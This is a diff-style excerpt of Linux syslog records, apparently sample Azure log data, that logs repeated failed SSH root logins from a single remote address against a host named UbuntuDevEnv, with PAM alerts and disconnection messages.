+1795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:21,UbuntuDevEnv,2019-06-28 04:58:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:23,UbuntuDevEnv,2019-06-28 04:58:22,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 10934 ssh2,89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,10934,,
+1797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:28,UbuntuDevEnv,2019-06-28 04:58:25,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 10934 ssh2,89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,10934,,
+1798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:28,UbuntuDevEnv,2019-06-28 04:58:28,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 10934 ssh2,89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,10934,,
+1799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:36,UbuntuDevEnv,2019-06-28 04:58:36,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 10934 ssh2 [preauth],89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,10934,,
+1800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:36,UbuntuDevEnv,2019-06-28 04:58:36,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 193.201.224.232 port 10934 ssh2],89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,10934,,
+1801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:36,UbuntuDevEnv,2019-06-28 04:58:36,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:36,UbuntuDevEnv,2019-06-28 04:58:36,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:36,UbuntuDevEnv,2019-06-28 04:58:36,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 10934: Too many authentication failures [preauth],89198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,10934,,
+1804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:40,UbuntuDevEnv,2019-06-28 04:58:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:43,UbuntuDevEnv,2019-06-28 04:58:42,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 15799 ssh2,89283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15799,,
+1806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:00,UbuntuDevEnv,2019-06-28 04:59:00,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 15799 ssh2],89283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15799,,
+1807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:00,UbuntuDevEnv,2019-06-28 04:59:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,89283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:00,UbuntuDevEnv,2019-06-28 04:59:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 15799: Too many authentication failures [preauth],89283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,15799,,
+1809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:00,UbuntuDevEnv,2019-06-28 04:59:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 15799 ssh2 [preauth],89283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15799,,
+1810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:00,UbuntuDevEnv,2019-06-28 04:59:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:05,UbuntuDevEnv,2019-06-28 04:59:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:07,UbuntuDevEnv,2019-06-28 04:59:07,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 64350 ssh2,89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64350,,
+1813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:28,UbuntuDevEnv,2019-06-28 04:59:25,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 193.201.224.232 port 64350 ssh2],89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64350,,
+1814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:30,UbuntuDevEnv,2019-06-28 04:59:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 64350 ssh2 [preauth],89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64350,,
+1815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:30,UbuntuDevEnv,2019-06-28 04:59:29,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 64350 ssh2,89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64350,,
+1816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:30,UbuntuDevEnv,2019-06-28 04:59:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:30,UbuntuDevEnv,2019-06-28 04:59:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:30,UbuntuDevEnv,2019-06-28 04:59:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 64350: Too many authentication failures [preauth],89352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,64350,,
+1819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:31,UbuntuDevEnv,2019-06-28 04:59:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:33,UbuntuDevEnv,2019-06-28 04:59:32,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 14557 ssh2,89474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,14557,,
+1821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:49,UbuntuDevEnv,2019-06-28 04:59:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:49,UbuntuDevEnv,2019-06-28 04:59:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 14557 ssh2 [preauth],89474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,14557,,
+1823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:49,UbuntuDevEnv,2019-06-28 04:59:48,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 14557: Too many authentication failures [preauth],89474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,14557,,
+1824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:49,UbuntuDevEnv,2019-06-28 04:59:48,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 14557 ssh2],89474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,14557,,
+1825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:49,UbuntuDevEnv,2019-06-28 04:59:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,89474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:59:59,UbuntuDevEnv,2019-06-28 04:59:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:00:02,UbuntuDevEnv,2019-06-28 05:00:01,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 22713 ssh2,89558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22713,,
+1828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:00:04,UbuntuDevEnv,2019-06-28 05:00:03,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 22713 ssh2,89558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22713,,
+1829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:00:28,UbuntuDevEnv,2019-06-28 05:00:12,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 22713 ssh2],89558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22713,,
+1830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:00:34,UbuntuDevEnv,2019-06-28 05:00:33,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 22713 ssh2,89558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22713,,
+1831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:40,UbuntuDevEnv,2019-06-28 05:01:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:42,UbuntuDevEnv,2019-06-28 05:01:41,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 41016 ssh2,90006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,41016,,
+1833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:59,UbuntuDevEnv,2019-06-28 05:01:58,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:59,UbuntuDevEnv,2019-06-28 05:01:58,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 41016 ssh2 [preauth],90006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,41016,,
+1835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:59,UbuntuDevEnv,2019-06-28 05:01:58,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 41016: Too many authentication failures [preauth],90006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,41016,,
+1836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:59,UbuntuDevEnv,2019-06-28 05:01:58,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:59,UbuntuDevEnv,2019-06-28 05:01:58,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 41016 ssh2],90006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,41016,,
+1838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:01:59,UbuntuDevEnv,2019-06-28 05:01:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:01,UbuntuDevEnv,2019-06-28 05:02:01,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 23591 ssh2,90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,23591,,
+1840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:03,UbuntuDevEnv,2019-06-28 05:02:02,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 23591 ssh2,90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,23591,,
+1841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:15,UbuntuDevEnv,2019-06-28 05:02:14,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 23591 ssh2 [preauth],90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,23591,,
+1842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:15,UbuntuDevEnv,2019-06-28 05:02:14,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 23591: Too many authentication failures [preauth],90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,23591,,
+1843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:15,UbuntuDevEnv,2019-06-28 05:02:14,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:15,UbuntuDevEnv,2019-06-28 05:02:14,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:15,UbuntuDevEnv,2019-06-28 05:02:14,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 193.201.224.232 port 23591 ssh2],90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,23591,,
+1846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:18,UbuntuDevEnv,2019-06-28 05:02:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:20,UbuntuDevEnv,2019-06-28 05:02:19,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 64580 ssh2,90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64580,,
+1848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:28,UbuntuDevEnv,2019-06-28 05:02:27,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 193.201.224.232 port 64580 ssh2],90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64580,,
+1849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:30,UbuntuDevEnv,2019-06-28 05:02:29,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 64580 ssh2,90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64580,,
+1850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:32,UbuntuDevEnv,2019-06-28 05:02:32,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 64580 ssh2 [preauth],90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64580,,
+1851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:32,UbuntuDevEnv,2019-06-28 05:02:32,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 64580 ssh2,90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64580,,
+1852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:32,UbuntuDevEnv,2019-06-28 05:02:32,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:32,UbuntuDevEnv,2019-06-28 05:02:32,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
